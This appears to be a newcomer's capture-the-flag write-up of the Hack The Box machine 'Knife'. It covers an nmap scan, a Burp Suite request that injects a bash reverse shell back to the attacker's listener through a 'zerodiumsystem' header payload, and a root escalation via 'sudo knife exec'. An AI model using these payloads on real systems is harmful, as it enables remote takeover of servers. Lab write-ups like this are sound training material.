After starting the OpenVPN connection, open the IP address provided by HTB in a browser to check the web portal.
So, let's start with an nmap scan. The command is:
sudo nmap -vv -A -O -p0-1024 -sV -oA knife 10.10.10.242
From this scan we found 1 port open, i.e. port 22.
So, from now on we will try to enumerate the SSH service on port 22 of 10.10.10.242.
First let's check whether this SSH service has a default login. For that, try:
1) ssh anonymous@10.10.10.242 (This tries to log in directly as user anonymous; leave the password blank)
OR
2) enum4linux -A 10.10.10.242
This shows that the SSH service does not have a default login.
Now let's try the web portal, using Burp Suite to track the packets sent and received. Turn intercept on, refresh the page, and check the request we made in Burp Suite.
Here we can add a reverse shell to connect directly to the web server. The steps are as follows.
First, send the request to Burp Repeater, then check your OpenVPN IP address using the ifconfig command.
Use this IP address for the reverse shell in the command below, which we enter in Burp Suite. But before that, start a listener on the port you want the web server to connect back to,
using the command: nc -nvlp 4232
zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.202/4232 0>&1'");
After this request is sent, the connection is made and we are logged in to the web server.
So now check the directories and find out the user flag from here.
Let's go for the root flag after the user flag is discovered.
I started by checking with the cd command, like cd root, but it showed a permission error.
So after some googling I found that we can use the same reverse shell methodology to get root's permissions. So first let's check the username with
sudo -l
So we can now go on to the next step, i.e. the command sudo knife exec --exec "exec '/bin/bash -i '"
Now get your root flag too..HEHEHE
All thanks to google!!!
Please let me know if anything is written wrong, as a newbie I would love the feedback and try to change that.